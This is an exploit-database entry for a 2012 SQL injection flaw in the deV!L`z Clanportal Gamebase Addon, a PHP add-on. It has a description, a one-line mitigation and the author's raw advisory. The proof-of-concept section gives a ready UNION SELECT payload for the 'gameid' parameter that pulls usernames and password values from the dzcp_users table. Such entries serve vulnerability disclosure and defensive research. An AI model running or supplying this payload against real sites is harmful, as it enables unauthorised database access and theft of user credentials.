header-logo
Suggest Exploit
vendor:
Gamebase Addon
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Gamebase Addon
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2012

deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability

The vulnerability exists in the deV!L`z Clanportal Gamebase Addon, which allows an attacker to inject arbitrary SQL commands via the 'gameid' parameter in the 'gamebase/?action=detail' URL. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

========================================================================================                 
| # Title    : deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability         
| # Author   Easy Laster                                                                                                                                                                                                                                                                                                          
| # Download : http://www.modsbar.de/Addons/464/gamebase-addon/
| # Script   : deV!L`z Clanportal Gamebase Addon       
| # Price    : 20€
| # Bug      : SQL Injection   
| # Date     : 05.01.2012
| # Language : PHP
| # Status   : vulnerable/Non-Public
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah                                                               
======================        Proof of Concept         =================================
[+] Vulnerability

    gamebase/?action=detail&gameid=

[+] Injectable

    http://[host]/[path]/gamebase/?action=detail&gameid=1+union+select+1,2,3,4,5,nick,
    pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dzcp_users+where+id=1--+